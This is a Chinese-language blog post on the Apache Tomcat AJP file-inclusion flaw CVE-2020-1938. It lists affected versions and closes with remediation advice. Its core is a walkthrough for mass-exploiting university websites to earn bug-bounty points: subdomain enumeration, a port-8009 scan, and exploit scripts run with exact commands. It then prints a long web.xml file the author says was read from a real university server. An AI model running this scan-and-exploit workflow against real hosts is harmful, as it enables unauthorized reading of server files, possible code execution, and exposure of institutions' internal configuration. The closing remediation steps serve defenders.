一. 漏洞概述
2月20日,國家信息安全漏洞共享平台(CNVD)發布了Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。該漏洞是由於Tomcat AJP協議存在缺陷而導致,攻擊者利用該漏洞可通過構造特定參數,讀取服務器webapp下的任意文件。若目標服務器同時存在文件上傳功能,攻擊者可進一步實現遠程代碼執行。利用方式屬於文件包含漏洞。目前,廠商已發布新版本完成漏洞修復。
二、影響范圍
受影響版本
- Apache Tomcat 6
- Apache Tomcat 7 < 7.0.100
- Apache Tomcat 8 < 8.5.51
- Apache Tomcat 9 < 9.0.31
不受影響版本
- Apache Tomcat = 7.0.100
- Apache Tomcat = 8.5.51
- Apache Tomcat = 9.0.31
三、漏洞復現測試
因為本次漏洞影響范圍比較大,所以這個漏洞在這幾天的各大src漏洞平台上都刷瘋了。尤其是教育src,已經達到了通過不給rank的地步。可惜本人反映太慢,沒有搶上食。提交的大多都被重復了,比較灰心,但是忙了一天。還是把檢測和利用過程寫下來吧。也不算一天白費。同時,這個漏洞可以去別的src平台刷,因為影響范圍太大了。只要使用了上述Apache Tomca版本,開啟8009端口Tomcat AJP協議,基本上都會中招。
以沈陽工業大學的某個網站做例子:具體域名不能透露,比較慫。
首先介紹一下使用的腳本工具
https://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner
下載解壓
運行環境:python2
以我今天提交的教育SRC模板來說吧:
1、首先找到一個今昨兩天還沒有被提交過得學校,這樣可能性會大一點.....沒錯,我就是沒有節操的吃爛分...
2、然后找到它的主站,進行子域名挖掘掃描,找出帶有阿帕奇中間件的子站,然后將域名復制到ip.txt。(只要域名,不要加服務協議,www、http/s都不要加)
3、使用threading-find-port-8009.py這個腳本,用來驗證ip.txt中的站點是否開啟8009端口,過濾出開啟了8009端口的域名保存到8009.txt,這些網站都是開啟了8009端口的命令為:python threading-find-port-8009.py
4、然后使用threading-CNVD-2020-10487-Tomcat-Ajp-lfi.py腳本去驗證是否存在這個漏洞,將驗證存在的域名保存到vul.txt。這里面就都是存在漏洞的網站。命令為:python threading-CNVD-2020-10487-Tomcat-Ajp-lfi.py
5、利用漏洞:使用CNVD-2020-10487-Tomcat-Ajp-lfi.py腳本去利用此漏洞讀取敏感文件信息,命令為:python CNVD-2020-10487-Tomcat-Ajp-lfi.p target.com
獲得以下部分xml敏感文件:
<?xml version="1.0" encoding="UTF-8"?> <web-app id="WebApp_ID" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"> <display-name>WKXT Application</display-name> <!-- start proxool連接池 --> <servlet> <display-name>proxool</display-name> <servlet-name>ServletConfigurator</servlet-name> <servlet-class> org.logicalcobwebs.proxool.configuration.ServletConfigurator</servlet-class> <init-param> <param-name>xmlFile</param-name> <param-value>WEB-INF/proxool.xml</param-value> </init-param> <load-on-startup>1</load-on-startup> </servlet> <servlet> <servlet-name>wkxtAdmin</servlet-name> <servlet-class>org.logicalcobwebs.proxool.admin.servlet.AdminServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>wkxtAdmin</servlet-name> <url-pattern>/wkxtAdmin</url-pattern> </servlet-mapping> <security-constraint> <web-resource-collection> <web-resource-name>proxool</web-resource-name> <url-pattern>/wkxtAdmin</url-pattern> </web-resource-collection> <auth-constraint> <role-name>manager</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>BASIC</auth-method> <realm-name>proxool manager Application</realm-name> </login-config> <security-role> <description>The role that is required to log in to the Manager Application</description> <role-name>manager</role-name> </security-role> <!-- end proxool連接池 --> <context-param> <param-name>contextConfigLocation</param-name> <param-value>/WEB-INF/applicationContext.xml</param-value> </context-param> <!-- spring 啟動配置 1表示自動啟動 --> <servlet> <servlet-name>context</servlet-name> <servlet-class>org.springframework.web.context.ContextLoaderServlet</servlet-class> <load-on-startup>2</load-on-startup> </servlet> <filter> <filter-name>ValidateScriptFilter</filter-name> <filter-class>com.lyt.util.filter.ValidateScriptFilter</filter-class> </filter> <filter> <filter-name>CharacterEncodingFilter</filter-name> <filter-class>com.lyt.util.web.CharacterEncodingFilter</filter-class> <init-param> <param-name>encoding</param-name> <param-value>UTF-8</param-value> </init-param> </filter> <filter> <description>解決SQL注入問 XSS(跨站腳本弱點) CSRF(跨站請求偽造)</description> <display-name>XssFilter</display-name> <filter-name>XssFilter</filter-name> <filter-class>com.magtech.filter.XssFilter</filter-class> </filter> <filter-mapping> <filter-name>CharacterEncodingFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>XssFilter</filter-name> <url-pattern>/CN/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>XssFilter</filter-name> <url-pattern>/EN/*</url-pattern> </filter-mapping> <!-- <filter-mapping> <filter-name>ValidateScriptFilter</filter-name> <url-pattern>/</url-pattern> </filter-mapping> --> <filter> <filter-name>UrlRewriteFilter</filter-name> <filter-class>org.tuckey.web.filters.urlrewrite.UrlRewriteFilter</filter-class> </filter> <filter-mapping> <filter-name>UrlRewriteFilter</filter-name> <url-pattern>/</url-pattern> </filter-mapping> <servlet> <servlet-name>action</servlet-name> <servlet-class>org.apache.struts.action.ActionServlet</servlet-class> <init-param> <param-name>config/pay</param-name> <param-value>/WEB-INF/struts-common.xml</param-value> </init-param> <init-param> <param-name>config</param-name> <param-value>/WEB-INF/struts-config.xml</param-value> </init-param> <init-param> <param-name>config/manage</param-name> <param-value>/WEB-INF/struts-manage.xml</param-value> </init-param> <init-param> <param-name>config/manage/volumn</param-name> <param-value>/WEB-INF/struts-volumn-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/article</param-name> <param-value>/WEB-INF/struts-article-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/article</param-name> <param-value>/WEB-INF/struts-article-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/article</param-name> <param-value>/WEB-INF/struts-article-en.xml</param-value> </init-param> <init-param> <param-name>config/manage/emag</param-name> <param-value>/WEB-INF/struts-emag-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/emag</param-name> <param-value>/WEB-INF/struts-emag-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/emag</param-name> <param-value>/WEB-INF/struts-emag-en.xml</param-value> </init-param> <init-param> <param-name>config/manage/attach</param-name> <param-value>/WEB-INF/struts-attach.xml</param-value> </init-param> <init-param> <param-name>config/manage/subject</param-name> <param-value>/WEB-INF/struts-subject.xml</param-value> </init-param> <init-param> <param-name>config/manage/domain</param-name> <param-value>/WEB-INF/struts-domain.xml</param-value> </init-param> <init-param> <param-name>config/manage/field</param-name> <param-value>/WEB-INF/struts-field.xml</param-value> </init-param> <init-param> <param-name>config/manage/channel</param-name> <param-value>/WEB-INF/struts-channel.xml</param-value> </init-param> <init-param> <param-name>config/manage/finance</param-name> <param-value>/WEB-INF/struts-finance-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/finance</param-name> <param-value>/WEB-INF/struts-finance-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/finance</param-name> <param-value>/WEB-INF/struts-finance-en.xml</param-value> </init-param> <init-param> <param-name>config/manage/money</param-name> <param-value>/WEB-INF/struts-money-ht.xml</param-value> </init-param> <init-param> <param-name>config/pay</param-name> <param-value>/WEB-INF/struts-money.xml</param-value> </init-param> <init-param> <param-name>config/manage/user</param-name> <param-value>/WEB-INF/struts-user-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/user</param-name> <param-value>/WEB-INF/struts-user-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/user</param-name> <param-value>/WEB-INF/struts-user-en.xml</param-value> </init-param> <init-param> <param-name>config/manage/author</param-name> <param-value>/WEB-INF/struts-author-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/keyword</param-name> <param-value>/WEB-INF/struts-keyword-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/journal</param-name> <param-value>/WEB-INF/struts-journal.xml</param-value> </init-param> <init-param> <param-name>config/manage/column</param-name> <param-value>/WEB-INF/struts-column-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/item</param-name> <param-value>/WEB-INF/struts-item-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/item</param-name> <param-value>/WEB-INF/struts-item-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/item</param-name> <param-value>/WEB-INF/struts-item-en.xml</param-value> </init-param> <init-param> <param-name>config/manage/rss</param-name> <param-value>/WEB-INF/struts-rss-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/rss</param-name> <param-value>/WEB-INF/struts-rss-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/rss</param-name> <param-value>/WEB-INF/struts-rss-en.xml</param-value> </init-param> <init-param> <param-name>config/manage/feedback</param-name> <param-value>/WEB-INF/struts-feedback-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/feedback</param-name> <param-value>/WEB-INF/struts-feedback-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/feedback</param-name> <param-value>/WEB-INF/struts-feedback-en.xml</param-value> </init-param> <init-param> <param-name>config/CN/order</param-name> <param-value>/WEB-INF/struts-order-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/order</param-name> <param-value>/WEB-INF/struts-order-en.xml</param-value> </init-param> <init-param> <param-name>config/manage/order</param-name> <param-value>/WEB-INF/struts-order-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/alert</param-name> <param-value>/WEB-INF/struts-alert-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/browse</param-name> <param-value>/WEB-INF/struts-browse.xml</param-value> </init-param> <init-param> <param-name>config/manage/download</param-name> <param-value>/WEB-INF/struts-download.xml</param-value> </init-param> <init-param> <param-name>config/manage/alertorder</param-name> <param-value>/WEB-INF/struts-alertorder-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/alert</param-name> <param-value>/WEB-INF/struts-alert-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/alert</param-name> <param-value>/WEB-INF/struts-alert-en.xml</param-value> </init-param> <init-param> <param-name>config/manage/ipaddr</param-name> <param-value>/WEB-INF/struts-ipaddr-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/comment</param-name> <param-value>/WEB-INF/struts-comment-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/comment</param-name> <param-value>/WEB-INF/struts-comment-en.xml</param-value> </init-param> <init-param> <param-name>config/manage/comment</param-name> <param-value>/WEB-INF/struts-comment-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/template</param-name> <param-value>/WEB-INF/struts-template.xml</param-value> </init-param> <init-param> <param-name>config/manage/click</param-name> <param-value>/WEB-INF/struts-click.xml</param-value> </init-param> <init-param> <param-name>config/manage/news</param-name> <param-value>/WEB-INF/struts-news-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/news</param-name> <param-value>/WEB-INF/struts-news-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/news</param-name> <param-value>/WEB-INF/struts-news-en.xml</param-value> </init-param> <init-param> <param-name>config/manage/folder</param-name> <param-value>/WEB-INF/struts-folder-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/model</param-name> <param-value>/WEB-INF/struts-model-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/down</param-name> <param-value>/WEB-INF/struts-down-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/mail</param-name> <param-value>/WEB-INF/struts-mail-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/adv</param-name> <param-value>/WEB-INF/struts-adv-ht.xml</param-value> </init-param> <init-param> <param-name>config/manage/location</param-name> <param-value>/WEB-INF/struts-location-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/location</param-name> <param-value>/WEB-INF/struts-location-cn.xml</param-value> </init-param> <init-param> <param-name>config/EN/location</param-name> <param-value>/WEB-INF/struts-location-en.xml</param-value> </init-param> <init-param> <param-name>config/manage/type</param-name> <param-value>/WEB-INF/struts-type.xml</param-value> </init-param> <init-param> <param-name>config/manage/provider</param-name> <param-value>/WEB-INF/struts-provider-ht.xml</param-value> </init-param> <init-param> <param-name>config/CN/provider</param-name> <param-value>/WEB-INF/struts-provider-cn.xml</param-value> </init-param>
4、修復建議
1. 如未使用Tomcat AJP協議:
如未使用 Tomcat AJP 協議,可以直接將 Tomcat 升級到 9.0.31、8.5.51或 7.0.100 版本進行漏洞修復。
如無法立即進行版本更新、或者是更老版本的用戶,建議直接關閉AJPConnector,或將其監聽地址改為僅監聽本機localhost。
具體操作:
(1)編輯 <CATALINA_BASE>/conf/server.xml,找到如下行(<CATALINA_BASE> 為 Tomcat 的工作目錄):
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443" />
(2)將此行注釋掉(也可刪掉該行):
<!--<Connectorport="8009" protocol="AJP/1.3"redirectPort="8443" />-->
(3)保存后需重新啟動,規則方可生效。
2. 如果使用了Tomcat AJP協議:
建議將Tomcat立即升級到9.0.31、8.5.51或7.0.100版本進行修復,同時為AJP Connector配置secret來設置AJP協議的認證憑證。例如(注意必須將YOUR_TOMCAT_AJP_SECRET更改為一個安全性高、無法被輕易猜解的值):
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS" secret="YOUR_TOMCAT_AJP_SECRET"/>
如無法立即進行版本更新、或者是更老版本的用戶,建議為AJPConnector配置requiredSecret來設置AJP協議認證憑證。例如(注意必須將YOUR_TOMCAT_AJP_SECRET更改為一個安全性高、無法被輕易猜解的值):
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS"requiredSecret="YOUR_TOMCAT_AJP_SECRET" />